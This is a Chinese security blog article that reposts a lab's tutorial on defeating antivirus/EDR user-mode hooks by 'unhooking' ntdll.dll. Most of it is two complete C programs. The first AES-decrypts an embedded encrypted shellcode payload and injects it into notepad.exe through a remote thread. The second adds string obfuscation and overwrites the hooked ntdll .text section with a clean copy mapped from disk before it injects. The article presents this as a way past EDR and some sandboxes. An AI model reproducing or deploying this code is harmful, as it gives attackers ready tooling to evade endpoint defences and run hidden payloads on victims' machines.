杀软EDR对抗-脱钩

luozhenni

杀软EDR对抗-脱钩

原文链接：杀软EDR对抗-脱钩
重生信息安全 2023-06-03 14:49 发表于山西      以下文章来源于蛇矛实验室 ，作者Gardenia  

1.杀软挂钩的工作原理

    一般的杀毒软件会在我们进程启动的时候注入DLL到进程中,然后对系统函数进行Hook(挂钩).从而拦截我们进程的执行流程,当然这个流程只针对于未被添加到白名单的程序.我们来看下效果图.

​

这里我设置了白名单为apps目录,在次目录下不会被检测.我们运行一个系统自带的软件Notepad来看下效果.首先X64dbg附加进程

​


​

我们随便搜索一个函数看看是否被HOOK

​

​

可以发现函数被jmp了,那么是不是我们的函数被HOOK了,如果不清楚我们在运行一个白名单里面的程序看下,或者看JMP后到那里就可以知道了,我们这里对比一下即可.

​



对比发现为在白名单里面的程序,被挂钩了.这里我们写一个注入程序,看看是否还能注入到进程中

1. #include <winternl.h>
   
2. #include <windows.h>
   
3. #include <stdio.h>
   
4. #include <stdlib.h>
   
5. #include <string.h>
   
6. #include <tlhelp32.h>
   
7. #include <wincrypt.h>
   
8. #pragma comment (lib, "crypt32.lib")
   
9. #pragma comment (lib, "advapi32")
   
10. 
    
11. unsigned char payload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8 };
    
12. unsigned char key[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84 };
    
13. 
    
14. unsigned int payload_len = sizeof(payload);
    
15. 
    
16. int AESDecrypt(char* payload, unsigned int payload_len, char* key, size_t keylen) {
    
17.   HCRYPTPROV hProv;
    
18.   HCRYPTHASH hHash;
    
19.   HCRYPTKEY hKey;
    
20. 
    
21.   if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
    
22.     return -1;
    
23.   }
    
24.   if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
    
25.     return -1;
    
26.   }
    
27.   if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
    
28.     return -1;
    
29.   }
    
30.   if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
    
31.     return -1;
    
32.   }
    
33. 
    
34.   if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) {
    
35.     return -1;
    
36.   }
    
37. 
    
38.   CryptReleaseContext(hProv, 0);
    
39.   CryptDestroyHash(hHash);
    
40.   CryptDestroyKey(hKey);
    
41. 
    
42.   return 0;
    
43. }
    
44. 
    
45. 
    
46. int FindTarget(const char* procname) {
    
47. 
    
48.   HANDLE hProcSnap;
    
49.   PROCESSENTRY32 pe32;
    
50.   int pid = 0;
    
51. 
    
52.   hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
53.   if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
    
54. 
    
55.   pe32.dwSize = sizeof(PROCESSENTRY32);
    
56. 
    
57.   if (!Process32First(hProcSnap, &pe32)) {
    
58.     CloseHandle(hProcSnap);
    
59.     return 0;
    
60.   }
    
61. 
    
62.   while (Process32Next(hProcSnap, &pe32)) {
    
63.     if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
    
64.       pid = pe32.th32ProcessID;
    
65.       break;
    
66.     }
    
67.   }
    
68. 
    
69.   CloseHandle(hProcSnap);
    
70. 
    
71.   return pid;
    
72. }
    
73. 
    
74. int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {
    
75. 
    
76.   LPVOID pRemoteCode = NULL;
    
77.   HANDLE hThread = NULL;
    
78. 
    
79.   AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
    
80. 
    
81.   pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
    
82.   WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);
    
83. 
    
84.   hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
    
85.   if (hThread != NULL) {
    
86.     WaitForSingleObject(hThread, 500);
    
87.     CloseHandle(hThread);
    
88.     return 0;
    
89.   }
    
90. 
    
91.   return -1;
    
92. }
    
93. 
    
94. 
    
95. int main(void) {
    
96. 
    
97.   int pid = 0;
    
98.   HANDLE hProc = NULL;
    
99. 
    
100.   pid = FindTarget("notepad.exe");
     
101. 
     
102.   if (pid) {
     
103.     printf("Notepad.exe PID = %d\n", pid);
     
104. 
     
105.     hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
     
106.       PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
     
107.       FALSE, (DWORD)pid);
     
108. 
     
109.     if (hProc != NULL) {
     
110.       Inject(hProc, payload, payload_len);
     
111.       CloseHandle(hProc);
     
112.     }
     
113.   }
     
114.   return 0;
     
115. }

复制代码

首先我们先在白名单下运行一下看看.

​


发现是可以直接注入的,这很正常,因为杀软不拦截我们的任何行为.那么我们放到其他地方来运行下看看效果.

​

可以发现我们的程序直接被杀掉了,注入的进程也被关闭了.

2.如何绕过EDR挂钩检测

1. #include <winternl.h>
   
2. #include <windows.h>
   
3. #include <stdio.h>
   
4. #include <stdlib.h>
   
5. #include <string.h>
   
6. #include <tlhelp32.h>
   
7. #include <wincrypt.h>
   
8. #pragma comment (lib, "crypt32.lib")
   
9. #pragma comment (lib, "advapi32")
   
10. 
    
11. unsigned char payload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8 };
    
12. unsigned char key[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84 };
    
13. 
    
14. unsigned int payload_len = sizeof(payload);
    
15. 
    
16. typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
    
17. typedef HANDLE (WINAPI * CreateFileMappingA_t)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);
    
18. typedef LPVOID (WINAPI * MapViewOfFile_t)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
    
19. typedef BOOL (WINAPI * UnmapViewOfFile_t)(LPCVOID);
    
20. 
    
21. unsigned char sNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
    
22. unsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
    
23. 
    
24. int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
    
25.   HCRYPTPROV hProv;
    
26.   HCRYPTHASH hHash;
    
27.   HCRYPTKEY hKey;
    
28. 
    
29.   if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
    
30.       return -1;
    
31.   }
    
32.   if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
    
33.       return -1;
    
34.   }
    
35.   if (!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){
    
36.       return -1;
    
37.   }
    
38.   if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
    
39.       return -1;
    
40.   }
    
41.   
    
42.   if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){
    
43.       return -1;
    
44.   }
    
45.   
    
46.   CryptReleaseContext(hProv, 0);
    
47.   CryptDestroyHash(hHash);
    
48.   CryptDestroyKey(hKey);
    
49.   
    
50.   return 0;
    
51. }
    
52. 
    
53. 
    
54. void XORcrypt(char str2xor[], size_t len, char key) {
    
55.     int i;
    
56. 
    
57.     for (i = 0; i < len; i++) {
    
58.         str2xor[i] = (BYTE)str2xor[i] ^ key;
    
59.     }
    
60. }
    
61. 
    
62. 
    
63. 
    
64. int FindTarget(const char *procname) {
    
65. 
    
66.         HANDLE hProcSnap;
    
67.         PROCESSENTRY32 pe32;
    
68.         int pid = 0;
    
69.                
    
70.         hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
71.         if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
    
72.                
    
73.         pe32.dwSize = sizeof(PROCESSENTRY32);
    
74.                
    
75.         if (!Process32First(hProcSnap, &pe32)) {
    
76.                 CloseHandle(hProcSnap);
    
77.                 return 0;
    
78.         }
    
79.                
    
80.         while (Process32Next(hProcSnap, &pe32)) {
    
81.                 if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
    
82.                         pid = pe32.th32ProcessID;
    
83.                         break;
    
84.                 }
    
85.         }
    
86.                
    
87.         CloseHandle(hProcSnap);
    
88.                
    
89.         return pid;
    
90. }
    
91. 
    
92. 
    
93. int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
    
94. 
    
95.   LPVOID pRemoteCode = NULL;
    
96.   HANDLE hThread = NULL;
    
97. 
    
98.   AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key));
    
99.   
    
100.   pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
     
101.   WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL);
     
102.   
     
103.   hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, 0, NULL);
     
104.   if (hThread != NULL) {
     
105.       WaitForSingleObject(hThread, 500);
     
106.       CloseHandle(hThread);
     
107.       return 0;
     
108.   }
     
109.   return -1;
     
110. }
     
111. 
     
112. 
     
113. static int UnhookNtdll(const HMODULE hNtdll, const LPVOID pMapping) {
     
114.   DWORD oldprotect = 0;
     
115.   PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER) pMapping;
     
116.   PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR) pMapping + pImgDOSHead->e_lfanew);
     
117.   int i;
     
118. 
     
119.   unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
     
120.   
     
121.   VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sVirtualProtect);
     
122.   
     
123.   for (i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) {
     
124.     PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) +
     
125.                         ((DWORD_PTR) IMAGE_SIZEOF_SECTION_HEADER * i));
     
126. 
     
127.     if (!strcmp((char *) pImgSectionHead->Name, ".text")) {
     
128.       VirtualProtect_p((LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
     
129.               pImgSectionHead->Misc.VirtualSize,
     
130.               PAGE_EXECUTE_READWRITE,
     
131.               &oldprotect);
     
132.       if (!oldprotect) {
     
133.           return -1;
     
134.       }
     
135.       memcpy( (LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
     
136.           (LPVOID)((DWORD_PTR) pMapping + (DWORD_PTR) pImgSectionHead->VirtualAddress),
     
137.           pImgSectionHead->Misc.VirtualSize);
     
138. 
     
139.       VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
     
140.               pImgSectionHead->Misc.VirtualSize,
     
141.               oldprotect,
     
142.               &oldprotect);
     
143.       if (!oldprotect) {
     
144.           return -1;
     
145.       }
     
146.       return 0;
     
147.     }
     
148.   }
     
149. 
     
150.   return -1;
     
151. }
     
152. 
     
153. 
     
154. 
     
155. 
     
156. int main(void) {
     
157.    
     
158.   int pid = 0;
     
159.     HANDLE hProc = NULL;
     
160. 
     
161.   unsigned char sNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a };
     
162. 
     
163.   unsigned char sCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0x0 };
     
164.   unsigned char sMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0x0 };
     
165.   unsigned char sUnmapViewOfFile[] = { 'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e', 0x0 };
     
166. 
     
167.   unsigned int sNtdllPath_len = sizeof(sNtdllPath);
     
168.   unsigned int sNtdll_len = sizeof(sNtdll);
     
169.   int ret = 0;
     
170.   HANDLE hFile;
     
171.   HANDLE hFileMapping;
     
172.   LPVOID pMapping;
     
173.   
     
174.   CreateFileMappingA_t CreateFileMappingA_p = (CreateFileMappingA_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sCreateFileMappingA);
     
175.   MapViewOfFile_t MapViewOfFile_p = (MapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sMapViewOfFile);
     
176.   UnmapViewOfFile_t UnmapViewOfFile_p = (UnmapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sUnmapViewOfFile);
     
177.   
     
178.   XORcrypt((char *) sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
     
179.   hFile = CreateFile((LPCSTR) sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
     
180.   if ( hFile == INVALID_HANDLE_VALUE ) {
     
181.       return -1;
     
182.   }
     
183. 
     
184.   hFileMapping = CreateFileMappingA_p(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
     
185.   if (! hFileMapping) {
     
186.       CloseHandle(hFile);
     
187.       return -1;
     
188.   }
     
189.   
     
190.   pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
     
191.   if (!pMapping) {
     
192.           CloseHandle(hFileMapping);
     
193.           CloseHandle(hFile);
     
194.           return -1;
     
195.   }
     
196.   
     
197.   printf("Check 1!\n"); getchar();
     
198.   
     
199.   ret = UnhookNtdll(GetModuleHandle((LPCSTR) sNtdll), pMapping);
     
200. 
     
201.   printf("Check 2!\n"); getchar();
     
202. 
     
203.   UnmapViewOfFile_p(pMapping);
     
204.   CloseHandle(hFileMapping);
     
205.   CloseHandle(hFile);
     
206.   
     
207.   pid = FindTarget("notepad.exe");
     
208. 
     
209.   if (pid) {
     
210.     printf("Notepad.exe PID = %d\n", pid);
     
211. 
     
212.     hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
     
213.             PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
     
214.             FALSE, (DWORD) pid);
     
215. 
     
216.     if (hProc != NULL) {
     
217.       Inject(hProc, payload, payload_len);
     
218.       CloseHandle(hProc);
     
219.     }
     
220.   }
     
221.   return 0;
     
222. }

复制代码

这段代码是加载一份新的NTDLL.DLL来恢复原本已经被破坏的NTDLL.DLL.整个过程就是我们首先加载一份新的NTDLL.DLL保存起来,然后将原本的代码段属性置成读写可执行的,在将我们内存加载的Text段进行替换到原来的Text段,这样原本HOOK的地方就被我们替换过去了,达到了脱钩的效果,我们去看下运行效果.

​


我们拖进X64DBG 看下效果吧.

​


目前还是被HOOK的状态,我们回车一下后x64dbg中右键分析这个函数.

​

发现函数已经被还原了.

3.脱钩后注入ShellCode到进程中

这样就简单的绕过了EDR的挂钩检测,部分沙箱这种技术同样可以绕过.

​